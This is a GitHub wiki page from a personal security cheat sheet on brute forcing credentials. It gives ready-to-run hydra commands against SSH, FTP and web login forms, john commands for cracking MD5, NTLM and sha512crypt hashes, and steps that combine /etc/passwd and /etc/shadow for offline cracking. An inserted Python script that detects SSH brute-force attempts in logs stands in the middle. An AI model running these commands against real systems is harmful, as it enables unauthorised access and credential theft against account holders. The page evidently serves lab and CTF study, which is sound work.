brute forcing - dvanmosselbeen/security-cheat-sheet GitHub Wiki
- Introduction
- Online Brute-Forcing
- Offline Brute-Forcing
  - Hashes
  - Linux passwords
  - Windows passwords
- Resources
## Introduction

Brute-forcing can be done with different methods and different tools, depending on the situation and what you need.
## Online Brute-Forcing

Brute-forcing online services means attacking the live server: feeding it passwords until one is accepted. You normally need a username or user account to start with. If you don't have one, go back to the Information Gathering process, or brute-force the usernames as well, which takes considerably longer.

Keep in mind that the service on the server may be protected with something like fail2ban. If it is, the brute-force attempt will be detected very quickly and the IP address of your machine will be banned.
Note: remove `-vV` if you don't want the very verbose output. Best done only if you know for sure the attack will work.
Brute forcing with one known username, so only brute forcing the passwords:

```
hydra -t 16 -l <USERNAME> -P /usr/share/wordlists/rockyou.txt -vV $IP ssh
```
Brute forcing with a known list of users and a known list of passwords:

```
hydra -t 16 -L usernames.txt -P locks.txt -vV $IP ssh
```

Note: both `usernames.txt` and `locks.txt` have one entry per line.
These are the same commands as for brute forcing an SSH server. Usernames can be brute-forced just as easily, as shown in the SSH example.

```
hydra -t 16 -l <USERNAME> -P /usr/share/wordlists/rockyou.txt -vV $IP ftp
```
...
For this you probably first want to use Burp Suite to figure out how the username and password are transmitted to the web server, and to see which error message you get back when the credentials are rejected. You also need to know a username.

A good source for this may be: https://github.com/dvanmosselbeen/TryHackMe_writeups/tree/main/hydra#post-web-form

```
hydra -l <USERNAME> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V
```
Another example with a cookie. You can try this out in the THM hackpark room:

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.249.121 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=EOeL86tosog9kLIpjou2A25jQ38AIn6MT%2FrphfVE8xj5okNiXtL1pnEDfnakIBLFROGazrBhvHFpoO%2Bk4DKFvT6UxuAVZ2S7bRhREfGr83PkPyJN14eUyXnu9chWl28QCoa95V3%2Fz09EQumZOdQncH91BV9SxBtovynGlyT9pHQPvcFH&__EVENTVALIDATION=X5U5Dd%2FHvaK8f%2F3CzSs7CxsRjLmmIv5vXbvSJX%2BClLwZbzmMW5QZ%2BBKkVlFiJSfhgWWu0JiZ%2BW%2BX781aAoZewE6yMgFyaQOR5wZCsxY6Sy8eHx0TZqrLyHHRcrOOrbvLI8a5MV43urbnt5IFHYicx3vlBLDU60FfuBba1NYalcz%2FqDWb&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -vv
```

Note that `^USER^` and `^PASS^` have been set inside this cookie this time.
You can protect services with fail2ban.
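As an added defender-side illustration (not part of the original cheat sheet), the following Python script shows what a fail2ban-style filter does with the SSH attempts produced by the hydra commands above: it parses sshd log lines and flags any source IP that accumulates `maxretry` failed or invalid-user logins inside a `findtime` window. The sample log lines, thresholds and function names are assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of sshd syslog lines (not captured from a real host).
SAMPLE_LOG = """\
Mar 10 12:00:01 host sshd[1201]: Failed password for root from 198.51.100.7 port 41022 ssh2
Mar 10 12:00:02 host sshd[1202]: Failed password for root from 198.51.100.7 port 41023 ssh2
Mar 10 12:00:03 host sshd[1203]: Failed password for invalid user admin from 198.51.100.7 port 41024 ssh2
Mar 10 12:00:04 host sshd[1204]: Invalid user test from 198.51.100.7 port 41025
Mar 10 12:00:05 host sshd[1205]: Failed password for root from 198.51.100.7 port 41026 ssh2
Mar 10 12:00:09 host sshd[1206]: Accepted publickey for alice from 203.0.113.5 port 50000 ssh2
Mar 10 12:00:30 host sshd[1207]: Failed password for alice from 203.0.113.5 port 50001 ssh2
Mar 10 12:20:00 host sshd[1208]: Failed password for alice from 203.0.113.5 port 50002 ssh2
"""

# Matches both password failures (including "invalid user" ones, i.e. username
# brute forcing) and bare "Invalid user" lines, capturing the timestamp and source IP.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?:Failed password for (?:invalid user )?\S+|Invalid user \S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failures(log_text, year=2024):
    """Yield (timestamp, ip) for every failed-login or invalid-user line."""
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            # syslog lines carry no year, so one is supplied (assumption)
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"]


def find_bruteforcers(log_text, maxretry=5, findtime=600):
    """Return {ip: time_of_trigger} for IPs reaching maxretry failures
    within a sliding findtime window (same idea as fail2ban's settings)."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(list)   # ip -> timestamps of failures still in window
    hits = {}
    for ts, ip in parse_failures(log_text):
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # expire failures older than the window
            q.pop(0)
        if len(q) >= maxretry and ip not in hits:
            hits[ip] = ts                 # this is where fail2ban would ban the IP
    return hits


if __name__ == "__main__":
    for ip, when in find_bruteforcers(SAMPLE_LOG).items():
        print(f"ban {ip} (threshold reached at {when:%H:%M:%S})")
```

With the defaults, only the host hammering `root`/`admin`/`test` is flagged; the two spaced-out failures from the second address stay below the threshold, which is the behaviour a sensible `maxretry`/`findtime` pair should give.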
## Offline Brute-Forcing

Brute-force offline services. See also my other detailed documents:
### Hashes

```
# md5 hash
echo "482c811da5d5b4bc6d497ffa98491e38" > hashfile.txt
# Identify the hash
hashid -j hashfile.txt
# Crack the hash
john --format=<format> --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
```

For example:

```
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
```
### Linux passwords

First we need to `unshadow`, which requires both the `/etc/passwd` and the `/etc/shadow` files:

```
unshadow local_passwd local_shadow > unshadowed.txt
```

Then crack the unshadowed file:

```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt
```
See also the documents:

- Exploiting writeable etc passwd

### Windows passwords
```
echo 5460C85BD858A11475115D2DD3A82333 > ntlm.txt
hashid -j ntlm.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ntlm.txt
```
See also `dumphash` in Metasploit.
## Resources

My other documents: